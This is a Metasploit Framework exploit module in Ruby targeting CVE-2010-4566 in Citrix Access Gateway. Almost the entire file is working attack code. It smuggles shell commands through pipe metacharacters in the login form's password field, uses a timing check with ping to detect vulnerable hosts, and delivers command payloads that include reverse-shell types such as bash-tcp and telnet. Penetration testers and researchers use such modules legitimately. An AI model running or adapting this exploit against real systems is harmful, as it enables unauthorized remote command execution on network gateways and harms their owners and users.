##
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Citrix Access Gateway Command Execution',
   'Description'    => %q{
     The Citrix Access Gateway provides support for multiple authentication types.
    When utilizing the external legacy NTLM authentication module known as
    ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
    line utility to verify a user's identity and password.  By embedding shell
    metacharacters in the web authentication form it is possible to execute
    arbitrary commands on the Access Gateway.
   },
   'Author'         =>
    [
     'George D. Gal', # Original advisory
     'Erwin Paternotte', # Exploit module
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 11873 $',
   'References'     =>
    [
     [ 'CVE', '2010-4566' ],
     [ 'OSVDB', '70099' ],
     [ 'BID', '45402' ],
     [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'Space'       => 127,
     'DisableNops' => true,
     'Compat'      =>
      {
       'PayloadType' => 'cmd cmd_bash',
       'RequiredCmd' => 'generic telnet bash-tcp'
      }
    },
   'DefaultOptions' =>
    {
     'WfsDelay' => 30
    },
   'Platform'       => [ 'unix' ],
   'Arch'           => ARCH_CMD,
   'Targets'        => [[ 'Automatic', { }]],
   'DisclosureDate' => 'Dec 21 2010',
   'DefaultTarget'  => 0))

  register_options(
   [
    Opt::RPORT(443),
    OptBool.new('SSL', [ true, 'Use SSL', true ]),
   ], self.class)

 end

 def post(command, background)
  username = rand_text_alphanumeric(20)

  if background
   sploit = Rex::Text.uri_encode('|' + command + '&')
  else
   sploit = Rex::Text.uri_encode('|' + command)
  end

  data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
  data << username
  data << "&password="
  data << sploit

  res = send_request_cgi({
   'uri'     => '/',
   'method'  => 'POST',
   'data'    => data
  }, 25)
 end

 def check
  print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

  # Try running/timing 'ping localhost' to determine is system is vulnerable
  start = Time.now
  post("ping -c 10 127.0.0.1", false)
  elapsed = Time.now - start
  if elapsed >= 3
   return Exploit::CheckCode::Vulnerable
  end

  return Exploit::CheckCode::Safe
 end

 def exploit
  cmd = payload.encoded

  if not post(cmd, true)
   raise RuntimeError, "Unable to execute the desired command"
  end
 end
end